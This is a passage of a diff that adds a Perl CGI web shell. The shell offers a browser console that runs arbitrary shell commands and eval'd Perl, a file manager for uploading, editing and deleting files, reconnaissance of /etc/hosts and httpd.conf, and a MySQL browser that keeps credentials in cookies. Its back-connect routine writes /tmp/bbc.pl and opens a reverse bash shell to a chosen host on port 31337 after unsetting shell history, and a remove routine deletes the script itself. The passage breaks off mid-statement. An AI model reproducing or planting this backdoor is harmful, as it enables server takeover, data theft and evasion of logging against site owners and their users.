+print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $arg(@last){print "<option value=\"$arg\">$arg</option>";}print <<END;
+</select><input type=submit id="sub5" value='>>'></form></td>$tabe<script>document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
+function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}</script>$dive
+END
+&PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(!-w $_[0]){$wr='<font color=#FF0000>  Not writable</font>'}else{$wr='<font color=#25ff00>  Writeable</font>'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferFile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$tab<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=rename_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value=RENAME></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=touch_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=touch_file value='$motime'><input type=submit value=TOUCH></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=".$_[0]."><input type=hidden name=c value=chmod_file><input type=submit value=CHMOD></form></td><td><form name=run method=POST><input type=hidden name=a value=download><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=DOWNLOAD></form></td><td><form name=run method=POST><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=VIEW></form></td><td><form name=run method=POST><input type=hidden name=a value=edit_file_path><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=EDIT></form></td>$tabe</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Courier New';\">";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</font>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDuration second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print "<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx name=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"}@last=split(/ussr/,$h);$h=ah $h;print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");</script>
+END
+}sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/gis){$CurrentDir=~s!\Q//!/!g;if(!-r $1){$RunCommand="Can't read $1!";chop($CurrentDir=`$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print "$div$tab<td><span>HDD[mount]:</span>$div";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h]:</span>$div";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div";P(`$langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div";P(`$downloaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div";P(`$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div";P(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div";P(`$httpd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};if(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END;
+<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql'>PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr>$tabe</form><br><script>document.getElementById('nname').focus();</script>
+END
+}sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END;
+$tab<td><span>Current query:</span></td><td><form name='querys' method='post'><textarea name='query' cols=70 style='width:100%;height:60px'>$zapros</textarea><br/><input type=submit value='Query'><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form></td>$tabe$tabe
+END
+}sub sql_cq_form{print <<END;
+$tab<td><span>Get data from columns:</span></td><td><form name='cquerys' method='post'><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td>
+END
+}sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].'><input type="hidden" name="a" value="sql_databases"><input type=hidden name=database value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><input type=hidden name=table value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form method=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_columns"><input type=hidden name=column value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td></form><tr>';}sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END;
+<h1>Back-connect  [perl]</h1><br/><form name='nfp' method=post>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
+END
+&PrintVar;}sub back{open(FILE,">/tmp/bbc.pl");$bbc='#!/usr/bin/perl use IO::Socket;$system="/bin/bash";use Socket;use FileHandle;socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET,sockaddr_in("'.$port.'",inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE;unset SAVEHIST;echo PPS 3.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}sub NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END;
+<h1>Execution PERL-code</h1><form name=pf method=post><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
+END
+}sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print <<END;
+<code><br><form name=pfsd method=post>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
+END
+}sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=HtmlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDIT;print <<END;
+<div class=content><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form></div>
+END
+&PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZXxjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmRlZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8ZnJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYWNlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJlcGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZXJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJpbnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ+JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9udD4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGNvbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8pL2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuKiQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbGFjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQpe3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPHNwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlubmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg==");
+print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END;
+<h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="filemanager"><niput type=hidden name=path value=$ffpath><input type="hidden" name="ddd" value="$ViewF"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Files style="margin-top:5px"></form>
+END
+open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.querys.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;print $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>";$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb=$in{'database'};print <<END;
+<script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");</script>
+END
+print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Tables from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0 cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print "</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne 